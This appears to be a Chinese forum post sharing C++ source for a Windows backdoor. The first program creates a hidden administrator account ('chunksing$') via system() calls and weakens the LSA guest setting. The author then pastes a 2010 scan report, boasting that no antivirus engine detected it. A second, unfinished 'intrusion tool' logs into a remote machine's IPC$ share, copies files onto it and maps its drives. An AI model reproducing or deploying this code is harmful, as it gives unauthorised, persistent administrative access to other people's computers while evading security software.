// 后门.cpp : Defines the entry point for the console
application.
//
#include "stdafx.h"
#include "stdlib.h"
int main(int argc, char* argv[])
{
system("reg add
\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v
forceguest /t REG_DWORD /d 0x0 /f");
//使用简单文件共享
system("net start
lanmanworkstation");//开启IPC服务
system("net user chunksing$ chunksing
/add"); //建立帐户
system("net localgroup administrators chunksing$
/add"); //ADMINISTRATOR
//system("net start schedule ");//start at
return 0;
}
//相当出色的成绩啊,没有一个杀软检测出来!
扫描结果
:
全部的杀毒软件报告没有发现病毒!
时间
:
2010/07/03
09:25:35 (CST)
a-squared
5.0.0.13
20100703011713
2010-07-03
-
5.473
AntiVir
8.2.4.2
7.10.8.247
2010-07-02
-
0.263
Arcavir
2009
201006281601
2010-06-28
-
0.004
Authentium
5.1.1
201007021335
2010-07-02
-
1.393
AVAST!
4.7.4
100702-1
2010-07-02
-
0.013
AVG
8.5.793
271.1.1/2978
2010-07-03
-
0.269
BitDefender
7.90123.6363560
7.32553
2010-07-03
-
3.897
ClamAV
0.96.1
11316
2010-07-03
-
0.099
Comodo
3.13.579
5294
2010-07-02
-
0.914
CP Secure
1.3.0.5
2010.07.03
2010-07-03
-
0.070
Dr.Web
5.0.2.3300
2010.07.03
2010-07-03
-
8.568
F-Prot
4.4.4.56
20100702
2010-07-02
-
1.403
F-Secure
7.02.73807
2010.07.02.05
2010-07-02
-
0.194
GData
21.450/21.164
20100702
2010-07-02
-
7.072
Ikarus
T3.1.01.84
2010.07.02.76184
2010-07-02
-
7.511
Microsoft
1.5902
2010.07.03
2010-07-03
-
6.950
Norman
6.05.10
6.05.00
2010-07-02
-
6.011
nProtect
20100702.01
8879235
2010-07-02
-
8.216
Quick Heal
10.00
2010.06.30
2010-06-30
-
1.785
Sophos
3.09.0
4.55
2010-07-03
-
3.445
Sunbelt
3.9.2426.2
6537
2010-07-02
-
10.726
The Hacker
6.5.2.1
v00307
2010-07-01
-
0.358
VBA32
3.12.12.5
20100702.0840
2010-07-02
-
3.176
ViRobot
20100702
2010.07.02
2010-07-02
-
0.380
VirusBuster
4.5.11.10
10.126.115/2044374
2010-07-03
-
2.591
卡巴斯基
5.5.10
2010.07.02
2010-07-02
-
0.136
安博士V3
2010.06.18.01
2010.06.18
2010-06-18
-
1.241
安天
2.0.18
20100703.4826967
2010-07-03
-
0.119
江民杀毒
13.0.900
2010.07.02
2010-07-02
-
1.239
熊猫卫士
9.05.01
2010.06.30
2010-06-30
-
0.607
瑞星
20.0
22.54.04.04
2010-07-02
-
1.367
赛门铁克
1.3.0.24
20100702.003
2010-07-02
-
0.069
趋势科技
9.120-1004
7.280.16
2010-07-02
-
0.044
迈克菲
5400.1158
6031
2010-07-02
-
17.227
金山毒霸
2009.2.5.15
2010.7.2.17
2010-07-02
-
0.620
飞塔
4.1.133
12.109
2010-07-02
-
0.196
■Heuristic/Suspicious ■Exact
注意:
没有发现病毒,但并不代表这不是一个新生的病毒,扫描结果将存储入数据库
这个入侵工具暂时还没有写完.~-------------------------------------------------------
// 新版本采用面向对象程序设计思想.
#include "stdafx.h"
#include "stdlib.h"
#include "iostream"
using namespace std;
class ipc
{
public:
void ReceiveIp ();
void functure ();
private:
int a, ip[4];
char local[5], remote[5], cmd[50], username[20],
password[20];
}a;
void ipc::ReceiveIp ()
{
int n;
printf("请输入四段IP地址,每段用回车结束\n"); //从键盘输入IP地址
for( n = 0; n < 4; n++ )
scanf("%d", &ip[n]);
printf("请输入用户名和密码 \n");
scanf("%s%s", username, password);
sprintf(cmd,"net use \\\\%d.%d.%d.%d\\ipc$
\"%s\" /user:\"%s\"", ip[0], ip[1], ip[2],
ip[3],password,username);
system(cmd); }
void ipc::functure ()
{
while(1)
{
printf("请输入数字\n");
printf("1.将C盘的1.TXT送到对方的C盘中\n2.登陆后映射对方C:到本地为z:
\n3.\n4.\n5.\n6.\n");
scanf("%d",
&a);
switch(a)
{
case 1 :
{ printf("请输入本地盘符\n");
scanf("%s",&local); printf("请输入远程盘符\n");
scanf("%s",&remote); sprintf(cmd,"copy %s:\\1.txt
\\\\%d.%d.%d.%d\\%s$", local, ip[0], ip[1], ip[2],
ip[3], remote);
system(cmd);
break;
}
case 2 :
{
printf("请输入本地盘符\n");
scanf("%s",&local); printf("请输入远程盘符\n");
scanf("%s",&remote);
sprintf(cmd,"net use %s: \\%d.%d.%d.%d\\\%s$", local, ip[0],
ip[1], ip[2], ip[3], remote);
system(cmd);break;
}
case 3 :
printf("暂时还没有功能\n");break;
case 4 :
printf("暂时还没有功能\n");break;
case 5 :
printf("暂时还没有功能\n");break;
case 6 :
printf("暂时还没有功能\n");break;
default :
printf("您输入的数字有问题\n");
}
//system("cls");
}
}
int main(int argc, char* argv[])
{
a.ReceiveIp ();
a.functure ();
return 0;
}